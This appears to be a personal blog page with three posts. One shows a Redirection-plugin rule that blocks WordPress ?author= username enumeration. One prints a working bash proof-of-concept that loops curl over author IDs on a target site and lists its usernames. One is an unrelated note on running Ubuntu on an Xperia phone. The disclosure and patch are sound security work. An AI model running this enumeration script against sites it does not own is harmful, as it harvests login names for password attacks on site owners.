After my last post exploiting username enumeration i have looked deep and found a simple workaround to patch your blog for this vulnerability till wordpress has something to add to it.
I am right now using a wordpress plugin : Redirections
https://wordpress.org/extend/plugins/redirection/
Inside the plugin page which comes under : tools -> redirections
Add a new rule with following settings.
Source url : ^(.*)/?author=(.*)
target url : /
Reg Exp : Yes
Match : url only
Action : Redirect to url
and Add Redirection
all done… just try any url with ?author=no
now this url will be redirected back to your main page effectively nullifying the effect of user name enumeration.
Hi All,
We have recently seen WordPress User name enumeration Vulnerability disclosure here http://seclists.org/fulldisclosure/2011/May/493
Versions Effected are : 2.6, 3.1, 3.1.1, 3.1.3
Here i am enclosing a simple PoC which could be run on Bash Shell.
(Note : PoC on python is already available for those who are curious)
#!/bin/bash
# WordPress User Enumeration PoC by Anant Shrivastava
# Disclosure : http://seclists.org/fulldisclosure/2011/May/493
if [ $# -ne 1 ]
then
echo "Wordpress username enumeration PoC"
echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
echo $0 "URL of Website"
else
count=0
title=0
while [ $count -lt 10 ]
do
result=`curl -I -s --max-time 30 --max-filesize 1 $1?author=$count | grep -F 'Location:'`
name=`echo $result | rev | cut -f2 -d"/" | rev`
nm=`echo "$"$result`
if [ "$nm" != "$" ]
then
if [ $title == 0 ]
then
echo "ID : UserName"
title=1
fi
echo -n $count " : "
echo $name
fi
count=`expr $count + 1`
done
if [ $title == 0 ]
then
echo "Either this site is not vulnerable or is not using wordpress hosted"
fi
fi
Code could be download from here : wp_PoC_user_name_enum
I have been working on using any Linux Distribution on my handset (SE Xperia X10) and finally i have suceeded.
I have posted all the details in a nice manner on XDA Developer forum and would prefer getting bug reports and suggestions in their.
XDA DEVELOPERS Forum : Ubuntu Lucid CHROOT: updated scripts
CLI : command prompt at its best.

GUI on Xperia : LXDE
